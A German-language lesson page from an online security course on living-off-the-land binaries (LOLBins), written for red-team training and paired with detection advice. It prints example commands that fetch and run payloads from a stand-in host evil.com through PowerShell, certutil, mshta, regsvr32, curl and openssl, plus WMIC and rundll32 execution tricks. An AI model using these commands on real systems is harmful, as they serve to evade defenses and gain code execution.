0Pricing
Cyber Security Academy · Lektion

Living-off-the-Land-Binaries (LOLBins)

Verwenden Sie vertrauenswürdige Windows-Binärdateien (certutil, mshta, regsvr32), um die Erkennung zu umgehen.

Living-off-the-Land-Binaries (LOLBins) ist eine kostenlose Cyber Security Academy-Lektion auf CoddyKit. Dies ist Lektion 2 von 4. Du kannst die komplette Lektion unten kostenlos lesen – dann übst du sie direkt im Browser mit einem integrierten Code-Editor und einem KI-Tutor rund um die Uhr. Sie ist Teil des Cyber Security Academy-Lernpfads, und dein Fortschritt wird über Web und CoddyKit-App synchronisiert. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.

Was sind LOLBins?

Living-Off-the-Land Binaries (LOLBins) sind legitime Betriebssystem-Binärdateien und Tools, die von Angreifern für bösartige Aktionen zweckentfremdet werden. Da es sich um vertrauenswürdige, signierte Systemtools handelt, umgehen sie häufig Application Whitelisting und verringern die Erkennung durch AV/EDR.

Warum LOLBins effektiv sind

Vorteile für Angreifer:

  • Auf Zielsystemen bereits vorhanden – neue Dateien müssen nicht abgelegt werden
  • Von Microsoft/Apple signiert – umgehen die signaturbasierte Erkennung
  • Werden von Application-Whitelisting-Lösungen als vertrauenswürdig eingestuft
  • Erzeugen legitim wirkende Prozessbäume

PowerShell als LOLBin

PowerShell ist das am häufigsten missbrauchte LOLBin. Angreifer verwenden:

# Download and execute from memory:
powershell -enc BASE64_ENCODED_COMMAND
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"

certutil

certutil.exe ist ein Windows-Zertifikatstool, mit dem Dateien heruntergeladen werden können:

# Download file to disk:
certutil -urlcache -split -f http://evil.com/payload.exe C:\temp\payload.exe
# Base64 decode:
certutil -decode encoded.b64 decoded.exe

mshta und wscript

Skriptausführung über vertrauenswürdige Hosts:

# mshta: execute HTA application from URL
mshta http://evil.com/payload.hta
# wscript: execute VBScript/JScript
wscript //E:VBScript evil.vbs
# cscript: console script host
cscript //nologo payload.js

regsvr32 Squiblydoo

regsvr32.exe kann DLLs über URLs aus dem Internet laden und ausführen, wenn die Flags /s /n /u /i verwendet werden – dadurch wird AppLocker umgangen und nicht signierter Code als vertrauenswürdiger Prozess ausgeführt:

regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dll

WMIC und WMI-Ausführung

Windows Management Instrumentation führt Code remote und lokal aus:

# Execute command via WMI:
wmic process call create "powershell.exe -enc PAYLOAD"
# Remote execution:
wmic /node:TARGET process call create "cmd.exe /c payload.exe"

Rundll32

rundll32.exe lädt DLL-Einstiegspunkte und führt sie aus:

# Execute a DLL export:
rundll32 evil.dll,EntryPoint
# Run JavaScript via rundll32:
rundll32 javascript:"\..\mshtml,RunHTMLApplication " payload

Linux-LOLBins

Entsprechungen unter Linux:

# curl/wget for downloads:
curl http://evil.com/payload | bash
# Python for execution:
python3 -c "import os; os.system('whoami')"
# OpenSSL for file transfer:
openssl s_client -quiet -connect evil.com:443 | bash
# Find LOLBins: gtfobins.github.io

LOLBAS und GTFOBins

Referenzdatenbanken:

  • LOLBAS (lolbas-project.github.io) – Windows-Binärdateien, -Skripte und -Bibliotheken
  • GTFOBins (gtfobins.github.io) – Linux-/macOS-Binärdateien zur Ausnutzung von Schwachstellen, zum Lesen und Schreiben von Dateien sowie zur SUID-Eskalation

Missbrauch von LOLBins erkennen

Erkennungsstrategien:

  • PowerShell-Skriptblockprotokollierung (EventID 4104) – protokolliert entschlüsselte Befehle
  • Sysmon EventID 1: Prozesserstellung mit übergeordneter Prozesskette
  • Alarmieren Sie bei unerwarteten Beziehungen zwischen übergeordneten und untergeordneten Prozessen: Word → PowerShell, Excel → cmd
  • Netzwerkverbindungen von certutil, mshta oder powershell
  • UEBA-Baselines, um anomale Nutzung von Binärdateien zu erkennen

Schnelltest: LOLBins

Welche Windows-Binärdatei kann mithilfe des Flags -urlcache eine Datei aus dem Internet herunterladen?

Zusammenfassung der Lektion

LOLBins sind legitime Betriebssystemtools, die für bösartige Zwecke zweckentfremdet werden: PowerShell, certutil, mshta, regsvr32, rundll32 und WMIC unter Windows sowie curl, python und openssl unter Linux. Sie umgehen die Signaturerkennung und das Application Whitelisting. Für die Erkennung sind die Protokollierung der Prozesserstellung (Sysmon), die PowerShell-Skriptblockprotokollierung und verhaltensbasierte Baselines erforderlich. LOLBAS und GTFOBins sind unverzichtbare Referenzdatenbanken.

Häufig gestellte Fragen

Ist die Lektion „Living-off-the-Land-Binaries (LOLBins)“ kostenlos?

Ja — der vollständige Text von „Living-off-the-Land-Binaries (LOLBins)“ ist hier im Web kostenlos zu lesen. Um sie interaktiv zu üben (integrierter Code-Editor und 24/7 KI-Tutor) und den Rest des Cyber Security Academy-Kurses freizuschalten, upgrade auf CoddyKit PRO. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.

Was lerne ich in „Living-off-the-Land-Binaries (LOLBins)“?

Verwenden Sie vertrauenswürdige Windows-Binärdateien (certutil, mshta, regsvr32), um die Erkennung zu umgehen. Du übst Cyber Security Academy mit praktischem Code, den du direkt im Browser ausführst, und ein 24/7 KI-Tutor beantwortet deine Fragen während du die Lektion bearbeitest.

Brauche ich Erfahrung, um Cyber Security Academy zu starten?

Keine Vorkenntnisse erforderlich. Cyber Security Academy auf CoddyKit ist für Anfänger bis fortgeschrittene Lernende strukturiert, sodass du hier starten oder von Anfang an beginnen und in deinem eigenen Tempo voranschreiten kannst. Dies ist Lektion 2 von 4.

Wie lange dauert die Lektion „Living-off-the-Land-Binaries (LOLBins)“?

Die meisten CoddyKit-Lektionen dauern etwa 5–10 Minuten. Jede ist kompakt und interaktiv, sodass du stetig Fortschritte machst und genau dort weitermachst, wo du aufgehört hast – im Web und in der App.

Kann ich in dieser Cyber Security Academy-Lektion Code schreiben und ausführen?

Ja. Jede Cyber Security Academy-Lektion enthält einen integrierten Code-Editor, sodass du echten Code direkt in deinem Browser schreibst und ausführst und sofort KI-Feedback erhältst — ohne lokale Einrichtung erforderlich.

Alle Lektionen in diesem Kurs

  1. C2-Frameworks: Cobalt Strike und Sliver
  2. Living-off-the-Land-Binaries (LOLBins)
  3. Techniken für laterale Bewegungen
  4. Berichte für Red Teams schreiben
← Zurück zu Cyber Security Academy